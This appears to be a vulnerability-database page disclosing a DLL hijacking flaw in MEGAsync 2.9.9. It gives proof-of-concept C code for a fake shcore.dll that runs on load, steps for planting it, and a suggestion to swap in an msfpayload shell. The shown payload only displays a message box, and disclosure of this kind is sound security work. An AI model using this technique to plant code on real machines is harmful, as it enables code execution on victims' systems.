MEGAsync 2.9.9 DLL Hijacking

2016.08.30

Credit: Amir.ght

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: MEGAsync DLL Hijacking Exploit (shcore.dll)
# Date: 27-8-2016
# Author: Amir.ght
# Vendor Homepage: https://mega.nz
# Software Link:
https://mega.nz/MEGAsyncSetup.exe
# Version: 2.9.9
# Tested on:Windows 7
----------------------------------------------------------------------------------------------------------
Vuln DLL: shcore.dll
MEGAsync.exe will search for an load any DLL named "shcore.dll".
If an attacker can place the DLL in a location
where victim open MEGAsync.exe it will load and run the attackers DLL
and code.
also can generate a msfpayload DLL and spawn a shell, for example.
----------------------------------------------------------------------------------------------------------
# Exploit:
1- Save and compile below C code as 'shcore.dll' to create vuln DLL
2- Place 'shcore.dll' on Same Directory of MEGAsync
3- Open MEGAsync.exe :DLL
//gcc test.c -o shcore.dll -shared
//this dll show a message box
#include <windows.h>
#define DllExport __declspec (dllexport)
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
dll_hijack();
return 0;
}
int dll_hijack()
{
MessageBox(0, "DLL Hijacking!", "DLL Message", MB_OK);
return 0;
}

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

MEGAsync 2.9.9 DLL Hijacking

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.